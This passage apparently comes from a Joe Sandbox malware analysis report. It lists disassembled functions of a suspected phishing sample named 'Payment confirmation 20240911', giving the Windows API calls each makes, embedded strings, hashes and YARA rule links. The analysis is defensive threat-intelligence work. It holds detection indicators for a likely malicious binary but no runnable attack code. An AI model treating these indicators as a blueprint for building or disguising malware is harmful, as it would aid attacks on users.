                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: cd70e9fa6bf66a5304c247402abd14da37ad36b06b9390a6728710c6a6a9fcb6
                                          • Instruction ID: d9e842df83f3138b4bf5aa1c3653c08b571a18a5d8c997bf6608e375080f01ee
                                          • Opcode Fuzzy Hash: cd70e9fa6bf66a5304c247402abd14da37ad36b06b9390a6728710c6a6a9fcb6
                                          • Instruction Fuzzy Hash: 87919E311243069FC754EFA8C898D7EBBE5FF95614F40096DFA86972A0EB30E904CB52
                                          Function 0133B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0133B4A8
                                          • CharUpperBuffW.USER32(?,?), ref: 0133B5B7
                                          • VariantClear.OLEAUT32(?), ref: 0133B73A
                                            • Part of subcall function 0132A6F6: VariantInit.OLEAUT32(00000000), ref: 0132A736
                                            • Part of subcall function 0132A6F6: VariantCopy.OLEAUT32(?,?), ref: 0132A73F
                                            • Part of subcall function 0132A6F6: VariantClear.OLEAUT32(?), ref: 0132A74B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: 3b5b4a05d57d8db76318f3eded2f942b03cf18e969befd34b64aa204f398295f
                                          • Instruction ID: 4333d867edc3aca05abd0af65db19f3f3f2846603746ed168abd041762de22b0
                                          • Opcode Fuzzy Hash: 3b5b4a05d57d8db76318f3eded2f942b03cf18e969befd34b64aa204f398295f
                                          • Instruction Fuzzy Hash: 56917E746083069FCB10DF28C48496ABBF4EFD9718F04496DF88A9B355DB31E945CB52
                                          Function 01325D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E3BCF: _wcscpy.LIBCMT ref: 012E3BF2
                                          • _memset.LIBCMT ref: 01325E56
                                          • GetMenuItemInfoW.USER32 ref: 01325E85
                                          • SetMenuItemInfoW.USER32 ref: 01325F31
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01325F5B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: c512b633b8ce2a293fd003c6640de8149fb7908aa83c32e0939e04ed4753a0e8
                                          • Instruction ID: 4b6c81330088b6d4b18efcf1d3f6994cbfa147b00148c986d566ce2ee91b8009
                                          • Opcode Fuzzy Hash: c512b633b8ce2a293fd003c6640de8149fb7908aa83c32e0939e04ed4753a0e8
                                          • Instruction Fuzzy Hash: 7C51C432514322EAE715BB2CC844AFBBBE8EF55358F48452DF995D31D0D770CA488792
                                          Function 0134C2E7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(007542E0,?), ref: 0134C354
                                          • ScreenToClient.USER32(?,00000002), ref: 0134C384
                                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001), ref: 0134C3EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID: `"u
                                          • API String ID: 3880355969-810275233
                                          • Opcode ID: 492a94df6c278f45b493fa2e99c8f73dee3acb431ed57cf91400616bc93c2aa1
                                          • Instruction ID: 33f7d0e5b4c10ad2640e4b7bbeb48d6e6945882748f667decf84687c2883ea8c
                                          • Opcode Fuzzy Hash: 492a94df6c278f45b493fa2e99c8f73dee3acb431ed57cf91400616bc93c2aa1
                                          • Instruction Fuzzy Hash: 45518F31A01209EFCF21DF68C980AAE7BFAFF45364F208159F9559B291D770EA41CB90
                                          Function 01321050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 013210B8
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 013210EE
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 013210FF
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 01321181
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: DllGetClassObject
                                          • API String ID: 753597075-1075368562
                                          • Opcode ID: eba0926ca6a174232996f465bf468d93c9525d97461f6dafe71a03c4a6b553d2
                                          • Instruction ID: f5fad5142b27de11bc2f2526c145139ca414694c970d47737d5957feba0ccca4
                                          • Opcode Fuzzy Hash: eba0926ca6a174232996f465bf468d93c9525d97461f6dafe71a03c4a6b553d2
                                          • Instruction Fuzzy Hash: 374181B1600214EFDB15DF58C984A9B7BADEF45358F1480ADEA0ADF209D7B1E944CBA0
                                          Function 01325A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: adfde3522ef819139df359bad3dc2d61ad772145ebe43e2cc52dafd2600a2dd9
                                          • Instruction ID: f6f4e6b25b043dfa4faecc1eb522e1be2c2bdda968ddc1bcd0c37a8b5ce5b5df
                                          • Opcode Fuzzy Hash: adfde3522ef819139df359bad3dc2d61ad772145ebe43e2cc52dafd2600a2dd9
                                          • Instruction Fuzzy Hash: E141A371204312AFDB21EF28D884B9ABBE8EF89318F04451DE995972D1D770DA44CB62
                                          Function 0134B354 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0134B3E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID: `"u
                                          • API String ID: 634782764-810275233
                                          • Opcode ID: 23a4effd5eef9a646e302943214e2d12f0cc3e35d2775cd11a215fc17341fd21
                                          • Instruction ID: 8db529ccd8d40a1ef1d821cd05a3b6bb6c7684245cfd8480c23cdf0390ce74d8
                                          • Opcode Fuzzy Hash: 23a4effd5eef9a646e302943214e2d12f0cc3e35d2775cd11a215fc17341fd21
                                          • Instruction Fuzzy Hash: D531A234600208FFEF359E5DC884BA8BBE9EB05368F548512FA51E66A9C630F5409B61
                                          Function 0134D5EE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 0134D617
                                          • GetWindowRect.USER32(?,?), ref: 0134D68D
                                          • PtInRect.USER32(?,?,0134EB2C), ref: 0134D69D
                                          • MessageBeep.USER32(00000000,?,?,?,?,0134EB2C,?,?,?), ref: 0134D70E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID: `"u
                                          • API String ID: 1352109105-810275233
                                          • Opcode ID: e0c8977319ffc137c33aeac5d69baf159aac51d69f6eb1ca36ed6871bced283f
                                          • Instruction ID: 4edc1ebf02ad823a5c50042aab46d56d36b68b72b3d0535197da9d234a23c79f
                                          • Opcode Fuzzy Hash: e0c8977319ffc137c33aeac5d69baf159aac51d69f6eb1ca36ed6871bced283f
                                          • Instruction Fuzzy Hash: E141AB31A00119DFDB22CF98D484BA97FF9BB5A328F5881AAE5099B255D734F841CB80
                                          Function 01340458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 01340478
                                            • Part of subcall function 012E7F40: _memmove.LIBCMT ref: 012E7F8F
                                            • Part of subcall function 012EA2FB: _memmove.LIBCMT ref: 012EA33D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove$BuffCharLower
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 2411302734-567219261
                                          • Opcode ID: 68b2f4b95edb486852df68cf19b1e8f45dd3e16493ccbefc7ecf7be3dbcbea22
                                          • Instruction ID: b6779e8bfe126228ee93c953ee125f7c248e533c5060f6135db6c0c4e3b44bfe
                                          • Opcode Fuzzy Hash: 68b2f4b95edb486852df68cf19b1e8f45dd3e16493ccbefc7ecf7be3dbcbea22
                                          • Instruction Fuzzy Hash: B831AE7561421AEBCF04EF98C9409FEB3F4FF15218F008A29E562AB690DB31E905CB80
                                          Function 0131C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0131C684
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0131C697
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 0131C6C7
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 458670788-1403004172
                                          • Opcode ID: 47a28080b2be4b1acd354919cfc2ee4f94d1d7a3935a1913cd130ae62cdc49ed
                                          • Instruction ID: 20d7e263362655479fb5d492fc1aadee9cdcbd9a3633f5a4b35bfb4711292379
                                          • Opcode Fuzzy Hash: 47a28080b2be4b1acd354919cfc2ee4f94d1d7a3935a1913cd130ae62cdc49ed
                                          • Instruction Fuzzy Hash: 10212671940104BEDB189BA8C894DFF7BA8DF11368F585919E422E31E4DB745D0A8710
                                          Function 0134A698 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0134A74F
                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0134A75D
                                          • DestroyWindow.USER32 ref: 0134A764
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyWindow
                                          • String ID: `"u$msctls_updown32
                                          • API String ID: 4014797782-3838846204
                                          • Opcode ID: 81d2e0c07b2091dae471cb25f4f9f37ef18a2083aafb0a0069b0f7dcea805fbf
                                          • Instruction ID: c762822c236f86ca703b34309dd1a93bdf25b7ccd53afd2ac360bec15c1aea2b
                                          • Opcode Fuzzy Hash: 81d2e0c07b2091dae471cb25f4f9f37ef18a2083aafb0a0069b0f7dcea805fbf
                                          • Instruction Fuzzy Hash: 95213375600205AFDB21DF68DCC0EA73BEDEB5A7A8F440559FA0697251C770EC11CB60
                                          Function 01334A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01334A60
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01334A86
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 01334AB6
                                          • InternetCloseHandle.WININET(00000000), ref: 01334AFD
                                            • Part of subcall function 013356A9: GetLastError.KERNEL32(?,?,01334A2B,00000000,00000000,00000001), ref: 013356BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 1951874230-3916222277
                                          • Opcode ID: d1749156c49fae14292ded339a1ede29d319a730307905a5a95d059ea526b253
                                          • Instruction ID: 8bd6a69ed20ca6ff5987cce44e957ba0b1f3af150b8a9800e23dc8d92bf14b41
                                          • Opcode Fuzzy Hash: d1749156c49fae14292ded339a1ede29d319a730307905a5a95d059ea526b253
                                          • Instruction Fuzzy Hash: 642192B6640209BFE711DFA89C84EBBBAFCEB88648F00411AF54596150DB649D064779
                                          Function 0134EFA8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • GetCursorPos.USER32(?), ref: 0134EFE2
                                          • TrackPopupMenuEx.USER32 ref: 0134EFF7
                                          • GetCursorPos.USER32(?), ref: 0134F041
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0135F3C3,?,?,?), ref: 0134F077
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID: `"u
                                          • API String ID: 2864067406-810275233
                                          • Opcode ID: 4c7df89d2220be6a963fca0df77c04908faa8c69c7d443bd4d082ced90dde004
                                          • Instruction ID: 4ed4e0b112cc2261631ab5ef4813ebd209e24452fb42d066125e86118f194ad8
                                          • Opcode Fuzzy Hash: 4c7df89d2220be6a963fca0df77c04908faa8c69c7d443bd4d082ced90dde004
                                          • Instruction Fuzzy Hash: D521B135600018EFEB258F9DC898EEA7FFDFB89758F484069FA05472A1C331A951DB90
                                          Function 01348EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FC619: CreateWindowExW.USER32 ref: 012FC657
                                            • Part of subcall function 012FC619: GetStockObject.GDI32(00000011), ref: 012FC66B
                                            • Part of subcall function 012FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 012FC675
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01348F69
                                          • LoadLibraryW.KERNEL32(?), ref: 01348F70
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01348F85
                                          • DestroyWindow.USER32 ref: 01348F8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: a24bc3ff10db0cc2c5ae8a3615351449d39563e31ee73ffd40299eceaf3b7abb
                                          • Instruction ID: dae5ca9d57b66eb40511cdeb7270bc0effbf9c95e76aa9e4106d900dc37907e7
                                          • Opcode Fuzzy Hash: a24bc3ff10db0cc2c5ae8a3615351449d39563e31ee73ffd40299eceaf3b7abb
                                          • Instruction Fuzzy Hash: 5B21CD71200209AFEF214EA8EC40EBB7BEEEB49328F104668FB5493191D331EC559B60
                                          Function 0132E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0132E392
                                          • GetVolumeInformationW.KERNEL32 ref: 0132E3E6
                                          • __swprintf.LIBCMT ref: 0132E3FF
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0137DBF0), ref: 0132E43D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: f9553d23ea6c542f9ac7b5b7018a2871579ea674a19c2e96a61d814be0c3243b
                                          • Instruction ID: 000cf5015dc9b1d0a27195ad502afa72b6d9e5146b419a03f7474d505bc1b7b6
                                          • Opcode Fuzzy Hash: f9553d23ea6c542f9ac7b5b7018a2871579ea674a19c2e96a61d814be0c3243b
                                          • Instruction Fuzzy Hash: E8215075A40109AFCB10EFA9C888DAEBBB8EF59714F108069E509EB251D771EA05CB50
                                          Function 0131D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                            • Part of subcall function 0131D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0131D640
                                            • Part of subcall function 0131D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0131D653
                                            • Part of subcall function 0131D623: GetCurrentThreadId.KERNEL32(00000000), ref: 0131D65A
                                            • Part of subcall function 0131D623: AttachThreadInput.USER32(00000000), ref: 0131D661
                                          • GetFocus.USER32(0137DBF0), ref: 0131D7FB
                                            • Part of subcall function 0131D66C: GetParent.USER32(?), ref: 0131D67A
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0131D844
                                          • EnumChildWindows.USER32 ref: 0131D86C
                                          • __swprintf.LIBCMT ref: 0131D886
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                          • String ID: %s%d
                                          • API String ID: 1941087503-1110647743
                                          • Opcode ID: f99be288396bb38dc98f739fb9a7f1d1d5dc5cc354aea91e3c6ed0935f7ac8b6
                                          • Instruction ID: afd7444a85b130b579b2ad722754319cbbff102b52d4799eaae7bb8ed2328668
                                          • Opcode Fuzzy Hash: f99be288396bb38dc98f739fb9a7f1d1d5dc5cc354aea91e3c6ed0935f7ac8b6
                                          • Instruction Fuzzy Hash: 9911D6716002066BDF157FD4CC88FEA7BADAF55718F008079FE0DAA149CB7499458B70
                                          Function 013080E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0130869D: __getptd_noexit.LIBCMT ref: 0130869E
                                          • __lock.LIBCMT ref: 0130811F
